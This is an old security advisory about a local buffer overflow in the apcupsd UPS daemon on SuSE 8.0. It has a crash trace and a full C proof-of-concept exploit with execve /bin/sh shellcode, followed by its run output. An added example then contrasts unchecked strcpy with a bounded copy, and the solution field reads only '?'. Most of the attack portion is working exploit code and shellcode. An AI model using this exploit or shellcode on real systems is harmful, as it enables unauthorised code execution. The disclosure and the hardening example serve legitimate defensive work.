21st Mar 2003 [SBWID-6082]
COMMAND
apcupsd local buffer overflow
SYSTEMS AFFECTED
tested with apcupsd delivered with Suse 8.0
PROBLEM
Thanks to Serkan Akpolat [[email protected]] for the advisory:
Apcupsd is a daemon for most APC UPSs for Linux. There is no bounds
checking in the source code, so overflowing the buffer is possible.
Apcupsd is by default not setuid root (SuSE 8.0). A proof-of-concept
shell-spawning exploit is attached to the mail.
milkshake:~ # apcupsd -f
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
milkshake:~ # gdb -q /sbin/apcupsd ./core
(no debugging symbols found)...
Core was generated by `apcupsd -f
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libpthread.so.0...(no debugging symbols
found)...done.
[New Thread 1024 (LWP 1920)]
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x40091a99 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0 0x40091a99 in vfprintf () from /lib/libc.so.6
#1 0x400a8a86 in vsprintf () from /lib/libc.so.6
#2 0x08049b0c in strcpy ()
#3 0x41414141 in ?? ()
(gdb) q
The exploit spawns a shell with the uid of the user who runs the exploit.
Tested on SuSE 8.0
milkshake:~ # cat eXapcupsd.c
/* Proof of Concept Code for buffer overflow vulnerability in apcupsd--------*/
/* This code has been tested in SuSE 8.0 -----------------------------------*/
/* Apcupsd isn't by default setuid root in SuSE 8.0------------------------*/
/* This code spawns a shell with the uid of the user, who runs the exploit*/
/* Greetings to Avicenna , Hackpimp , Murat Balaban , core.gen.tr team---*/
/* Written by Serkan Akpolat [email protected] --------------------------*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 500
#define PADDING 3

char sc[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
/* Murat Balaban execve /bin/sh shellcode */

int main(void)
{
    char *env[3] = {sc, NULL};   /* shellcode is the only environment string */
    char buf[BUFSIZE];           /* over-long argument handed to apcupsd -f */
    int i, j, ret;
    int *ap;

    for (j = 0; j < PADDING; j++) {
        buf[j] = 'A';            /* junk bytes for alignment */
    }
    ap = (int *)(buf + PADDING);
    ret = 0xbffffffa - strlen(sc) - strlen("/sbin/apcupsd");
    printf("Shellcode is on 0x%08x , %d junk bytes used for alignment.\n", ret, PADDING);
    printf("\t\t<--PRESS ENTER-->");
    for (i = 0; i < BUFSIZE - 8; i += 4)
        *ap++ = ret;             /* fill the rest of the buffer with the address */
    *ap++ = '\0';
    getchar();
    execle("/sbin/apcupsd", "apcupsd", "-f", buf, NULL, env);
    return 0;
}
milkshake:~ # gcc eXapcupsd.c
milkshake:~ # ./a.out
Shellcode is on 0xbfffffc0 , 3 junk bytes used for alignment.
<--PRESS ENTER-->
apcupsd FATAL ERROR in apcconfig.c at line 833
Error opening configuration file
(AAA������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������): �~^
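The bug class the advisory describes is an argument copied into a fixed-size buffer with no length check. The following C program is an added example, not part of the advisory and not apcupsd's own source: it places that unchecked pattern beside a bounded copy that refuses an over-long `-f` argument instead of writing past the buffer. `CONF_PATH_MAX`, the function names and the constructed 500-byte argument are assumptions made for the demonstration; apcupsd's real buffer size and copy routine are not given on this page.

```c
#include <stdio.h>
#include <string.h>

/* Assumed destination buffer size. The advisory does not state apcupsd's
 * actual buffer size, so this value is a placeholder for the demonstration. */
#define CONF_PATH_MAX 256

/* The pattern the advisory describes: the argument is copied with no check
 * against the destination size, so any argument longer than dest overflows
 * it and overwrites whatever follows on the stack. */
void copy_path_unchecked(char *dest, const char *src)
{
    strcpy(dest, src);
}

/* Hardened form: measure first, including the terminating NUL, and reject an
 * input that does not fit rather than truncating or copying it. Returns 0 on
 * success and -1 when the input was refused. */
int copy_path_checked(char *dest, size_t dest_size, const char *src)
{
    size_t n = strlen(src);
    if (n >= dest_size)
        return -1;
    memcpy(dest, src, n + 1);
    return 0;
}

/* Constructed input: a run of 'len' 'A' bytes like the argument in the crash
 * transcript above, built in a static buffer (len is capped at 1023). */
const char *constructed_argument(size_t len)
{
    static char arg[1024];
    if (len > sizeof(arg) - 1)
        len = sizeof(arg) - 1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    return arg;
}

/* Mimics handling of "-f <path>" with the checked copy: stores the path in a
 * CONF_PATH_MAX buffer and returns 1 if it was accepted, 0 if it was refused. */
int accepts_config_path(const char *arg)
{
    char conf[CONF_PATH_MAX];
    if (copy_path_checked(conf, sizeof conf, arg) != 0) {
        fprintf(stderr, "config file path too long (limit %zu bytes)\n",
                sizeof conf - 1);
        return 0;
    }
    return 1;
}

int main(void)
{
    printf("normal path: %s\n",
           accepts_config_path("/etc/apcupsd/apcupsd.conf") ? "accepted" : "refused");
    printf("500-byte path: %s\n",
           accepts_config_path(constructed_argument(500)) ? "accepted" : "refused");
    return 0;
}
```

The check is `n >= dest_size` rather than `n > dest_size` because the terminating NUL needs its own byte; an input of exactly `CONF_PATH_MAX - 1` characters is the longest one that fits. Refusing the input outright is preferable to silent truncation, since a truncated path would be opened as a different file than the one the operator named.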
SOLUTION
?